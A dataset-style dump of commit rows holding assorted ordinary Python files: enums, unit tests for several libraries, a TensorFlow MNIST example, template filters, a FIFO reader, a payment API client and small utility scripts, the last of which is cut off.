commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
f2f4accf304cfe1aaed042f7df35bc0ee86a6c59 | Add enums for service/record/assignment/transaction type | netsgiro/enums.py | netsgiro/enums.py | from enum import IntEnum
class ServiceType(IntEnum):
NONE = 0
OCR_GIRO = 9
AVTALEGIRO = 21
class RecordType(IntEnum):
TRANSMISSION_START = 10
ASSIGNMENT_START = 20
TRANSACTION_AMOUNT_1 = 30
TRANSACTION_AMOUNT_2 = 31
TRANSACTION_AMOUNT_3 = 32 # Only for TransactionType 20 and 21
TRANSACTION_SPECIFICATION = 49
AGREEMENTS = 78 # TODO Better name?
ASSIGNMENT_END = 88
TRANSMISSION_END = 89
class AvtaleGiroAssignmentType(IntEnum):
PAYMENT_REQUEST = 0 # TODO Better name?
AGREEMENTS = 24 # TODO Better name?
CANCELATION = 36 # TODO Better name?
class AvtaleGiroTransactionType(IntEnum):
NO_NOTIFICATION_FROM_BANK = 2 # TODO Better name?
NOTIFICATION_FROM_BANK = 21 # TODO Better name?
CANCELATION = 93 # TODO Better name?
AGREEMENTS = 94 # TODO Better name?
class OcrGiroTransactionType(IntEnum):
FROM_GIRO_DEBITED_ACCOUNT = 10
FROM_STANDING_ORDERS = 11
FROM_DIRECT_REMITTANCE = 12
FROM_BUSINESS_TERMINAL_GIRO = 13
FROM_COUNTER_GIRO = 14
FROM_AVTALEGIRO = 15
FROM_TELEGIRO = 16
FROM_CASH_GIRO = 17
REVERSING_WITH_KID = 18
PURCHASE_WITH_KID = 19
REVERSING_WITH_TEXT = 20
PURCHASE_WITH_TEXT = 21
| Python | 0.000001 | |
ca16e36b79e9c7dcd5cb31d899ef9c50ebf602c1 | add unit test for _nearest_neighbor() | urbanaccess/tests/test_network.py | urbanaccess/tests/test_network.py | import pytest
import pandas as pd
from urbanaccess import network
@pytest.fixture
def nearest_neighbor_dfs():
data = {
'id': (1, 2, 3),
'x': [-122.267546, -122.264479, -122.219119],
'y': [37.802919, 37.808042, 37.782288]
}
osm_nodes = pd.DataFrame(data).set_index('id')
data = {
'node_id_route': ['1_transit_a', '2_transit_a',
'3_transit_a', '4_transit_a'],
'x': [-122.265417, -122.266910, -122.269741, -122.238638],
'y': [37.806372, 37.802687, 37.799480, 37.797234]
}
transit_nodes = pd.DataFrame(data).set_index('node_id_route')
data = {'node_id_route': ['1_transit_a', '2_transit_a',
'3_transit_a', '4_transit_a'],
'nearest_osm_node': [2, 1, 1, 3]}
index = range(4)
expected_transit_nodes = pd.concat(
[transit_nodes, pd.DataFrame(data, index).set_index('node_id_route')],
axis=1)
return osm_nodes, transit_nodes, expected_transit_nodes
def test_nearest_neighbor(nearest_neighbor_dfs):
osm_nodes, transit_nodes, expected_transit_nodes = nearest_neighbor_dfs
transit_nodes['nearest_osm_node'] = network._nearest_neighbor(
osm_nodes[['x', 'y']],
transit_nodes[['x', 'y']])
assert expected_transit_nodes.equals(transit_nodes)
| Python | 0.000002 | |
7c5dbbcd1de6376a025117fe8f00516f2fcbb40d | Add regressiontest for crypto_onetimeauth_verify | tests/unit/test_auth_verify.py | tests/unit/test_auth_verify.py | # Import nacl libs
import libnacl
# Import python libs
import unittest
class TestAuthVerify(unittest.TestCase):
'''
Test onetimeauth functions
'''
def test_auth_verify(self):
msg = b'Anybody can invent a cryptosystem he cannot break himself. Except Bruce Schneier.'
key1 = libnacl.utils.rand_nonce()
key2 = libnacl.utils.rand_nonce()
sig1 = libnacl.crypto_auth(msg, key1)
sig2 = libnacl.crypto_auth(msg, key2)
self.assertTrue(libnacl.crypto_auth_verify(sig1, msg, key1))
with self.assertRaises(ValueError) as context:
libnacl.crypto_auth_verify(sig1, msg, key2)
self.assertTrue('Failed to auth msg' in context.exception)
with self.assertRaises(ValueError) as context:
libnacl.crypto_auth_verify(sig2, msg, key1)
self.assertTrue('Failed to auth msg' in context.exception)
self.assertTrue(libnacl.crypto_auth_verify(sig2, msg, key2))
'''
Test onetimeauth functions
'''
def test_onetimeauth_verify(self):
msg = b'Anybody can invent a cryptosystem he cannot break himself. Except Bruce Schneier.'
key1 = libnacl.utils.rand_nonce()
key2 = libnacl.utils.rand_nonce()
sig1 = libnacl.crypto_onetimeauth(msg, key1)
sig2 = libnacl.crypto_onetimeauth(msg, key2)
self.assertTrue(libnacl.crypto_onetimeauth_verify(sig1, msg, key1))
with self.assertRaises(ValueError) as context:
libnacl.crypto_onetimeauth_verify(sig1, msg, key2)
self.assertTrue('Failed to auth msg' in context.exception)
with self.assertRaises(ValueError) as context:
libnacl.crypto_onetimeauth_verify(sig2, msg, key1)
self.assertTrue('Failed to auth msg' in context.exception)
self.assertTrue(libnacl.crypto_onetimeauth_verify(sig2, msg, key2))
| Python | 0.004908 | |
80ccffb269b04af02224c1121c41d4e7c503bc30 | Add unit test for intersperse | tests/util/test_intersperse.py | tests/util/test_intersperse.py | # This file is part of rinohtype, the Python document preparation system.
#
# Copyright (c) Brecht Machiels.
#
# Use of this source code is subject to the terms of the GNU Affero General
# Public License v3. See the LICENSE file or http://www.gnu.org/licenses/.
from rinoh.util import intersperse
def test_intersperse():
separator = "."
letters = [127, 0, 0, 1]
localhost = list(intersperse(letters, separator))
assert [127, ".", 0, ".", 0, ".", 1] == localhost
| Python | 0.000001 | |
8f18a1b75b68d8c97efd57673b160a9ceda608a3 | Add Manifest class | manifest.py | manifest.py | __author__ = 'fervent'
| Python | 0 | |
e56d9337cc5c63ef61afe8ffdee2019e19af0963 | Add test for resolved issue 184 | test/test_issue184.py | test/test_issue184.py | from rdflib.term import Literal
from rdflib.term import URIRef
from rdflib.graph import ConjunctiveGraph
def test_escaping_of_triple_doublequotes():
"""
Issue 186 - Check escaping of multiple doublequotes.
A serialization/deserialization roundtrip of a certain class of
Literals fails when there are both, newline characters and multiple subsequent
quotation marks in the lexical form of the Literal. In this case invalid N3
is emitted by the serializer, which in turn cannot be parsed correctly.
"""
g=ConjunctiveGraph()
g.add((URIRef('http://foobar'), URIRef('http://fooprop'), Literal('abc\ndef"""""')))
# assert g.serialize(format='n3') == '@prefix ns1: <http:// .\n\nns1:foobar ns1:fooprop """abc\ndef\\"\\"\\"\\"\\"""" .\n\n'
g2=ConjunctiveGraph()
g2.parse(data=g.serialize(format='n3'), format='n3')
assert g.isomorphic(g2) is True | Python | 0 | |
0988a2a18688a8b8e07d94e1609405c17bbe717d | Add test suite for the playlist plugin | test/test_playlist.py | test/test_playlist.py | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Thomas Scholtes.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import division, absolute_import, print_function
import os
import tempfile
import unittest
from test import _common
from test import helper
import beets
class PlaylistTest(unittest.TestCase, helper.TestHelper):
def setUp(self):
self.setup_beets()
self.lib = beets.library.Library(':memory:')
i1 = _common.item()
i1.path = beets.util.normpath('/a/b/c.mp3')
i1.title = u'some item'
i1.album = u'some album'
self.lib.add(i1)
self.lib.add_album([i1])
i2 = _common.item()
i2.path = beets.util.normpath('/d/e/f.mp3')
i2.title = 'another item'
i2.album = 'another album'
self.lib.add(i2)
self.lib.add_album([i2])
i3 = _common.item()
i3.path = beets.util.normpath('/x/y/z.mp3')
i3.title = 'yet another item'
i3.album = 'yet another album'
self.lib.add(i3)
self.lib.add_album([i3])
self.playlist_dir = tempfile.TemporaryDirectory()
with open(os.path.join(self.playlist_dir.name, 'test.m3u'), 'w') as f:
f.write('{0}\n'.format(beets.util.displayable_path(i1.path)))
f.write('{0}\n'.format(beets.util.displayable_path(i2.path)))
self.config['directory'] = '/'
self.config['playlist']['relative_to'] = 'library'
self.config['playlist']['playlist_dir'] = self.playlist_dir.name
self.load_plugins('playlist')
def tearDown(self):
self.unload_plugins()
self.playlist_dir.cleanup()
self.teardown_beets()
def test_query_name(self):
q = u'playlist:test'
results = self.lib.items(q)
self.assertEqual(set([i.title for i in results]), set([
u'some item',
u'another item',
]))
def test_query_path(self):
q = u'playlist:{0}/test.m3u'.format(self.playlist_dir.name)
results = self.lib.items(q)
self.assertEqual(set([i.title for i in results]), set([
u'some item',
u'another item',
]))
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| Python | 0 | |
71577ec62406c0119ea2282a3011ebbc368a3a04 | add test_pollbot.py | tests/test_pollbot.py | tests/test_pollbot.py | #!/usr/bin/env python3
import pytest
import poll_bot
class TestPollBot:
def test_extract_emoji(self):
lines_and_emojis = {
' M)-ystery meat': 'M',
'🐕 dog sandwiches': '🐕',
'3 blind mice': '3',
'🇺🇸 flags': '🇺🇸',
'<:python3:232720527448342530> python3!': '<:python3:232720527448342530>',
}
for input, output in lines_and_emojis.items():
assert poll_bot.extract_emoji(input) == output | Python | 0.000007 | |
1e9980aff2370b96171011f7fa50d4517957fa86 | Add a script to check TOI coverage for a bbox and zoom range | tilepack/check_toi.py | tilepack/check_toi.py | import mercantile
import argparse
def main():
parser = argparse.ArgumentParser()
parser.add_argument('min_lon',
type=float,
help='Bounding box minimum longitude/left')
parser.add_argument('min_lat',
type=float,
help='Bounding box minimum latitude/bottom')
parser.add_argument('max_lon',
type=float,
help='Bounding box maximum longitude/right')
parser.add_argument('max_lat',
type=float,
help='Bounding box maximum latitude/top')
parser.add_argument('min_zoom',
type=int,
help='The minimum zoom level to include')
parser.add_argument('max_zoom',
type=int,
help='The maximum zoom level to include')
args = parser.parse_args()
print("zoom\tmissing from toi\tin aoi")
for zoom in range(args.min_zoom, args.max_zoom + 1):
tiles_in_aoi = set([
'{}/{}/{}'.format(z, x, y)
for x, y, z in mercantile.tiles(
args.min_lon, args.min_lat, args.max_lon, args.max_lat,
[zoom]
)
])
with open('toi.z{}.txt'.format(zoom), 'r') as f:
tiles_in_toi = set([
l.strip()
for l in f.readlines()
])
print("{zoom:2d}\t{tiles_not_in_toi}\t{tiles_in_aoi}".format(
zoom=zoom,
tiles_not_in_toi=len(tiles_in_aoi - tiles_in_toi),
tiles_in_aoi=len(tiles_in_aoi),
))
if __name__ == '__main__':
main()
| Python | 0 | |
17654378a6039203ead1c711b6bb8f7fb3ad8680 | add Ermine ELF dumper. | tools/dump-ermine-elfs.py | tools/dump-ermine-elfs.py | #!/usr/bin/env python
#
# Copyright (C) 2013 Mikkel Krautz <mikkel@krautz.dk>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the Mumble Developers nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# `AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# dump-ermine-elfs.py is a simple script that dumps all embedded
# ELFs (executables and shared libraries) contained in an Ermine
# packed ELF binary.
import os
import sys
def usage():
print 'dump-ermine-elfs.py <fn>'
sys.exit(1)
def main():
if len(sys.argv) < 2:
usage()
fn = sys.argv[1]
f = open(fn, 'r')
all = f.read()
f.close()
elfMagic = '\x7fELF'
elfPairs = []
for i in range(0, len(all)):
if i == 0: # skip binary itself
continue
if all[i:i+len(elfMagic)] == elfMagic:
elfPairs.append(i)
elfPairs.append(len(all))
for i, ofs in enumerate(elfPairs):
if i == len(elfPairs)-1: # done?
break
end = elfPairs[i+1]
fn = 'dumped-%i.elf' % i
print 'dumping elf @ 0x%x to %s' % (ofs, fn)
f = open(fn, 'w')
f.write(all[ofs:end])
f.close()
if __name__ == '__main__':
main()
| Python | 0 | |
4a1e46d279df1d0a7eaab2ba8175193cd67c1f63 | Add some template filters: sum, floatformat, addslashes, capfirst, stringformat (copied from django), dictsort, get, first, join, last, length, random, sort. Needed to write tests for all those filters | lighty/templates/templatefilters.py | lighty/templates/templatefilters.py | '''Package contains default template tags
'''
from decimal import Decimal, ROUND_DOWN
import random as random_module
from filter import filter_manager
# Numbers
def sum(*args):
'''Calculate the sum of all the values passed as args and
'''
return reduce(lambda x, y: x + float(y), args)
filter_manager.register(sum)
def floatformat(raw_value, format='0'):
'''Make pretty float representation
Lets:
a = '12.4'
Then:
>>> print floatformat(a)
12
>>> print floatformat(a, '2')
12.40
>>> print floatformat(a, '-2')
12.4
'''
# Parse arguments
try:
digits = abs(int(format))
except:
raise Exception('floatformat arguments error: format is not integer')
try:
value = Decimal(raw_value)
except:
raise Exception('floatformat supports only number values')
# Make formater
digit = 0
formatter = Decimal('1')
while digit < digits:
digit += 1
formatter *= Decimal('0.1')
result = value.copy_abs().quantize(formatter, rounding=ROUND_DOWN)
result = str(result.copy_sign(value))
if format[0] == '-':
return result.rstrip('0')
return result
# Strings
def addslashes(value):
'''Add a slashes to string
'''
return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
filter_manager.register(addslashes)
def capfirst(value):
'''Capitalizes the first character in string
'''
return value and value[0].upper() + value[1:]
filter_manager.register(capfirst)
def stringformat(value, format):
"""Formats the variable according to the format, a string formatting
specifier.
This specifier uses Python string formating syntax, with the exception that
the leading "%" is dropped.
See http://docs.python.org/lib/typesseq-strings.html for documentation
of Python string formatting
"""
return (u"%" + str(format)) % value
filter_manager.register(stringformat)
# Lists, dicts, strings
def dictsort(value, key, order=''):
'''Sort dict
'''
return sorted(value, key=key, reverse=(order != ''))
filter_manager.register(dictsort)
def get(value, index):
'''Get item with specified index
'''
if issubclass(value.__class__, dict):
index = value[value.keys()[index]]
if index in value:
return value[index]
return ''
filter_manager.register(get)
def first(value):
'''Get first item from list
'''
return get(value, 0)
filter_manager.register(first)
def join(value, joiner):
'''Join list or items with joiner
>>> join([1, 2, 3], ' ')
'1 2 3'
'''
return joiner.join([str(item) for item in value])
filter_manager.register(join)
def last(value):
'''Get last item from list
'''
return get(value, len(value) - 1)
filter_manager.register(last)
def length(value):
'''Return's the length of the string, dict or list
'''
return len(value)
def random(value):
'''Get random item from list or dict
'''
return get(value, random_module.random(len(value)))
filter_manager.register(random)
def sort(value):
'''Sort list
'''
return sorted(value)
filter_manager.register(sort)
| Python | 0.000001 | |
654e2bf70b4a47adb53d8a0b17f0257e84c7bdf8 | read in data, check things look sensible. Note: need to change unknowns in group col so we have a more usable data type in the pandas dataframe. | main.py | main.py | # Data modelling challenge.
__author__ = 'Remus Knowles <remknowles@gmail.com>'
import pandas as pd
F_DATA = r'data challenge test.csv'
def main():
df = pd.read_csv(F_DATA)
print df.head()
if __name__ == '__main__':
main() | Python | 0 | |
0046f5276c9572fbc40080cc2201a89ee37b96b2 | Create mwis.py | mwis.py | mwis.py | weights = [int(l) for l in open('mwis.txt')][1:]
def mwis(weights):
n = len(weights)
weights = [0] + weights
maxsetweight = [0, weights[1]]
for i in range(2, n + 1):
maxsetweight.append(max(maxsetweight[i - 1], maxsetweight[i - 2] + weights[i] ))
i = n
maxset = []
while i > 1:
if maxsetweight[i-2] + weights[i] > maxsetweight[i-1]:
maxset.append(i)
i -= 2
if i == 1:
maxset.append(1)
break
else:
i -= 1
return (maxsetweight[n], maxset)
a, b = mwis(weights)
print "The weight of the maximum weight independent set of the graph is :", a
print "The vertices that constitute the maximum weight independent set of the path graph are :", b
| Python | 0.000005 | |
837382f44d91a44c14884f87c580b969e5ef5a4a | add example for tensorboard | models/toyexample_03_tensorboard.py | models/toyexample_03_tensorboard.py | import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True, reshape=False, validation_size=0)
K = 200
L = 100
M = 60
N = 30
# initialization
X = tf.placeholder(tf.float32, [None, 28, 28, 1])
# placeholder for correct answers
Y_ = tf.placeholder(tf.float32, [None, 10])
W1 = tf.Variable(tf.truncated_normal([784, K], stddev=0.1))
B1 = tf.Variable(tf.zeros([K]))
W2 = tf.Variable(tf.truncated_normal([K, L], stddev=0.1))
B2 = tf.Variable(tf.zeros([L]))
W3 = tf.Variable(tf.truncated_normal([L, M], stddev=0.1))
B3 = tf.Variable(tf.zeros([M]))
W4 = tf.Variable(tf.truncated_normal([M, N], stddev=0.1))
B4 = tf.Variable(tf.zeros([N]))
W5 = tf.Variable(tf.truncated_normal([N, 10], stddev=0.1))
B5 = tf.Variable(tf.zeros([10]))
# model
XX = tf.reshape(X, [-1, 28 * 28]) # Input Layer
# summary1 = tf.summary.tensor_summary("INPUT", XX, "input of model")
with tf.name_scope("Hidden_1"):
Y1 = tf.nn.sigmoid(tf.matmul(XX, W1) + B1) # Hidden Layer 1
with tf.name_scope("Hidden_2"):
Y2 = tf.nn.sigmoid(tf.matmul(Y1, W2) + B2) # Hidden Layer 2
with tf.name_scope("Hidden_3"):
Y3 = tf.nn.sigmoid(tf.matmul(Y2, W3) + B3) # Hidden Layer 3
with tf.name_scope("Hidden_4"):
Y4 = tf.nn.sigmoid(tf.matmul(Y3, W4) + B4) # Hidden Layer 4
Ylogits = tf.matmul(Y4, W5) + B5 # Output Layer
Y = tf.nn.softmax(Ylogits)
# summary2 = tf.summary.tensor_summary("OUTPUT", Y, "output of model")
# loss function
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(Ylogits, Y_)
cross_entropy = tf.reduce_mean(cross_entropy) * 100
cost_train = tf.scalar_summary("cost_train", cross_entropy)
cost_val = tf.scalar_summary("cost_val", cross_entropy)
# % of correct answers found in batch
correct_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
acc_train = tf.scalar_summary("acc_train", accuracy)
acc_val = tf.scalar_summary("acc_val", accuracy)
# training step
learning_rate = 0.003
optimizer = tf.train.AdamOptimizer(learning_rate)
train_step = optimizer.minimize(cross_entropy)
init = tf.initialize_all_variables()
summary = tf.merge_all_summaries()
sess = tf.Session()
#### BEGIN ####
# Create a summary writer
writer = tf.train.SummaryWriter("./private/", flush_secs=1)
# add the 'graph' to the event file.
writer.add_graph(sess.graph)
# writer.add_graph(tf.get_default_graph())
#### END ####
sess.run(init)
idx = 1;
for i in range(100001):
# Load batch of images and correct answers
batch_X, batch_Y = mnist.train.next_batch(100)
train_data = {X: batch_X, Y_: batch_Y}
# train
_, ct, at, = sess.run([train_step,cost_train,acc_train], feed_dict=train_data)
writer.add_summary(ct, i)
writer.add_summary(at, i)
# success? add code to print it
if i % 100 == 0:
# c, ct, at = sess.run([cross_entropy, cost_train, acc_train], feed_dict=train_data)
# print("Accuracy on train set (i = " + str(i) + "): " + str(a))
# success on test data?
test_data = {X: mnist.test.images, Y_: mnist.test.labels}
a, c, cv, av = sess.run([accuracy,cross_entropy, cost_val, acc_val], feed_dict=test_data)
writer.add_summary(cv, i)
writer.add_summary(av, i)
print("Accuracy on test set (i = " + str(i) + "): " + str(a))
| Python | 0 | |
572a47ab8b05f8e93ec5e1b415cb56387d4279ca | add m_restart.py | pyscf/nao/m_restart.py | pyscf/nao/m_restart.py |
#An HDF5 file is a container for two kinds of objects: datasets (array-like collections of data), and groups (folder-like containers that hold datasets).
#Groups work like dictionaries, and datasets work like NumPy arrays
def read_rst_h5py (filename=None):
import h5py ,os
if filename is None:
path = os.getcwd()
filename =find('*.hdf5', path)
#filename= 'SCREENED_COULOMB.hdf5'
with h5py.File(filename, 'r') as f:
#print("Keys: %s" % f.keys())
a_group_key = list(f.keys())[0]
# Get the data
data = list(f[a_group_key])
msg = 'RESTART: Full matrix elements of screened interactions (W_c) was read from {}'.format(filename)
return data, msg
def write_rst_h5py(data, filename = None):
import h5py
if filename is None: filename= 'SCREENED_COULOMB.hdf5'
with h5py.File(filename, 'w') as data_file:
data_file.create_dataset('W_c', data=data)
data_file.close
msg = 'Full matrix elements of screened interactions (W_c) stored in {}'.format(filename)
return msg
def write_rst_yaml (data , filename=None):
import yaml
if filename is None: filename= 'SCREENED_COULOMB.yaml'
with open(filename, 'w+', encoding='utf8') as outfile:
yaml.dump(data, outfile, default_flow_style=False, allow_unicode=True)
msg = 'Full matrix elements of screened interactions stored in {}'.format(filename)
return msg
def read_rst_yaml (filename=None):
import yaml, os
if filename is None:
path = os.getcwd()
filename =find('*.yaml', path)
with open(filename, 'r') as stream:
try:
data = yaml.load(stream)
msg = 'RESTART: Full matrix elements of screened interactions (W_c) was read from {}'.format(filename)
return data, msg
except yaml.YAMLError as exc:
return exc
| Python | 0.000026 | |
a0c303e9c1f7ac75e078e6f3ae9586ba68a24f63 | add the solution | python/oj/mergeSort.py | python/oj/mergeSort.py | #!/usr/bin/python
# coding:utf8
'''
@author: shaoyuliang
@contact: mshao@splunk.com
@since: 7/16/14
'''
# https://oj.leetcode.com/problems/merge-sorted-array/
class Solution:
# @param A a list of integers
# @param m an integer, length of A
# @param B a list of integers
# @param n an integer, length of B
# @return nothing
def merge(self, A, m, B, n):
for i in range(n):
A.append(B[i])
a = 0
b = m
while a < b and b < m + n:
if A[a] < A[b]:
a += 1
continue
else:
c = A.pop(b)
b += 1
A.insert(a, c)
A = [1, 3, 5]
Solution().merge(A, 3, [2, 4], 2)
print A | Python | 0.000256 | |
863ec839e24f2f17ba9d1dfb1177592f34cfc5e3 | Create Transaction.py | pyvogue/Transaction.py | pyvogue/Transaction.py |
import requests
import json
import urllib
class Transaction():
def getall(self,trx,res,decode_content=False):
"""
Gets all your transactions
args:
trx -- the transaction id to be fetched
res -- the response type expected : json or xml
"""
url = "https://voguepay.com/?v_transaction_id="+str(trx)+"&type="+str(res)
if ( decode_content ):
dec = self.__parse_json(requests.get(url).text)
return (dec)
else:
return requests.get(url).text
def paylink(self,param):
"""
Generate a one time payment link from params
args:
param -- a dictionary of payment params
e.g
params = {'v_merchant_id':'14307-23682',
'memo':'testing',
'total':'1200'
}
"""
urlg = "https://voguepay.com/?p=linkToken&"+urllib.urlencode(param)
return requests.get(urlg)
def __parse_json(self, response_obj):
"""
This function takes in json response sent back by the
server
Returns a python dictionary of status, email, amount,memo etc
"""
data = json.loads(response_obj)
return data
| Python | 0.000001 | |
3ae0ea21cc6b1afadb0dd72e29016385d18167ab | Add FifoReader class to utils | DebianDevelChangesBot/utils/fiforeader.py | DebianDevelChangesBot/utils/fiforeader.py | # -*- coding: utf-8 -*-
#
# Debian Changes Bot
# Copyright (C) 2008 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import fcntl
import select
import threading
import traceback
class FifoReader(object):
__shared_state = {}
read_lock = threading.Lock()
stop_lock = threading.Lock()
running = False
quitfds = None
def __init__(self):
self.__dict__ = self.__shared_state
print "lol"
def start(self, callback, fifo_loc):
self.callback = callback
self.fifo_loc = fifo_loc
threading.Thread(target=self.run).start()
def run(self):
self.read_lock.acquire()
try:
for fileobj in self.gen_messages():
try:
self.callback(fileobj)
except Exception, exc:
print "Uncaught exception caught inside fiforeader"
traceback.print_exc()
finally:
fileobj.close()
finally:
self.read_lock.release()
def gen_messages(self):
self.running = True
self.quitfds = os.pipe()
while self.running:
fifo = os.open(self.fifo_loc, os.O_RDONLY | os.O_NONBLOCK)
flags = fcntl.fcntl(fifo, fcntl.F_GETFL)
fcntl.fcntl(fifo, fcntl.F_SETFD, flags & ~os.O_NONBLOCK)
readfds, _, _ = select.select([fifo, self.quitfds[0]], [], [])
# If our anonymous descriptor was written to, exit loop
if not self.running or self.quitfds[0] in readfds:
os.close(fifo)
os.close(self.quitfds[0])
os.close(self.quitfds[1])
break
if fifo not in readfds:
continue
yield os.fdopen(fifo)
def stop(self):
self.stop_lock.acquire()
try:
if self.running:
self.running = False
os.write(self.quitfds[1], '1')
# Block until we have actually stopped
self.read_lock.acquire()
self.read_lock.release()
finally:
self.stop_lock.release()
| Python | 0 | |
5c3304ffbd78ee47b2c4d197165de08200e77632 | Fix the `week` behavour to match api2 | standup/apps/status/helpers.py | standup/apps/status/helpers.py | import re
from datetime import date, datetime, timedelta
from standup.database.helpers import paginate as _paginate
def paginate(statuses, page=1, startdate=None, enddate=None, per_page=20):
from standup.apps.status.models import Status
if startdate:
statuses = statuses.filter(Status.created >= startdate)
if enddate:
statuses = statuses.filter(Status.created <= enddate)
return _paginate(statuses, int(page), per_page=per_page)
def startdate(request):
dates = request.args.get('dates')
day = request.args.get('day')
week = request.args.get('week')
if dates == '7d':
return date.today() - timedelta(days=7)
elif dates == 'today':
return date.today()
elif isday(day):
return get_day(day)
elif isday(week):
return week_start(get_day(week))
return None
def enddate(request):
day = request.args.get('day')
week = request.args.get('week')
if isday(day):
return get_day(day) + timedelta(days=1)
elif isday(week):
return week_end(get_day(week))
return None
def isday(day):
return day and re.match('^\d{4}-\d{2}-\d{2}$', day)
def get_day(day):
return datetime.strptime(day, '%Y-%m-%d')
def get_weeks(num_weeks=10):
weeks = []
current = datetime.now()
for i in range(num_weeks):
weeks.append({"start_date": week_start(current), \
"end_date": week_end(current), \
"weeks_ago": i })
current = current - timedelta(7)
return weeks
def week_start(d):
"""Weeks start on the Monday on or before the given date"""
return d - timedelta(d.isoweekday() - 1)
def week_end(d):
"""Weeks start on the Sunday on or after the given date"""
return d + timedelta(7 - d.isoweekday())
| import re
from datetime import date, datetime, timedelta
from standup.database.helpers import paginate as _paginate
def paginate(statuses, page=1, startdate=None, enddate=None, per_page=20):
from standup.apps.status.models import Status
if startdate:
statuses = statuses.filter(Status.created >= startdate)
if enddate:
statuses = statuses.filter(Status.created <= enddate)
return _paginate(statuses, int(page), per_page=per_page)
def startdate(request):
dates = request.args.get('dates')
day = request.args.get('day')
week = request.args.get('week')
if dates == '7d':
return date.today() - timedelta(days=7)
elif dates == 'today':
return date.today()
elif isday(day):
return get_day(day)
elif isday(week):
return get_day(week)
return None
def enddate(request):
day = request.args.get('day')
week = request.args.get('week')
if isday(day):
return get_day(day) + timedelta(days=1)
elif isday(week):
return get_day(week) + timedelta(days=7)
return None
def isday(day):
return day and re.match('^\d{4}-\d{2}-\d{2}$', day)
def get_day(day):
return datetime.strptime(day, '%Y-%m-%d')
def get_weeks(num_weeks=10):
weeks = []
current = datetime.now()
for i in range(num_weeks):
weeks.append({"start_date": week_start(current), \
"end_date": week_end(current), \
"weeks_ago": i })
current = current - timedelta(7)
return weeks
def week_start(d):
"""Weeks start on the Monday on or before the given date"""
return d - timedelta(d.isoweekday() - 1)
def week_end(d):
"""Weeks start on the Sunday on or after the given date"""
return d + timedelta(7 - d.isoweekday())
| Python | 0.999933 |
6e096fc10c7eb580ec11fbee585dd2aa3210e2b3 | add settings example | blog/settings_example.py | blog/settings_example.py | SITE_URL = "http://project.com"
SITE_NAME = "Project Name"
COMMENTS_APP = 'threadedcomments' # for example
RECAPTCHA_PUBLIC_KEY = 'put-your-key-here'
RECAPTCHA_PRIVATE_KEY = 'put-your-key-here'
SOUTH_MIGRATION_MODULES = {
'taggit': 'taggit.south_migrations',
}
TAGGIT_TAGCLOUD_MIN = 1
TAGGIT_TAGCLOUD_MAX = 8
GRAPPELLI_ADMIN_TITLE = u'{} Administration'.format(SITE_NAME) | Python | 0 | |
edfba32b5dd24c0fe58da9bbbe84267e81754233 | add demo.py | demo.py | demo.py | import pdb
import json
from pprint import pprint
from chrome_debugger import protocol
from chrome_debugger import interface
from chrome_debugger import websocket
context = protocol.connect("ws://localhost:9222/devtools/page/D08C4454-9122-6CC8-E492-93A22F9C9727")
header = websocket.parse_response(context["sock"].recv(4096))
interface.debugger_enable(context)
while True:
pprint(protocol.recv(context))
| Python | 0.000001 | |
863ae7a76567913f60a758a9fb974a27e9bc58d2 | add 21 | p021.py | p021.py | from utils import divisors
def d(n):
return sum(divisors(n))
print sum(filter(lambda n: n != d(n) and n == d((d(n))), range(1, 10000))) | Python | 0.999999 | |
a3a92435781300966ca59d5316693d0306abd600 | Create osrm_OD_matrix.py | osrm_OD_matrix.py | osrm_OD_matrix.py | # using osrm to create a big dirty OD matrix
import csv
import requests
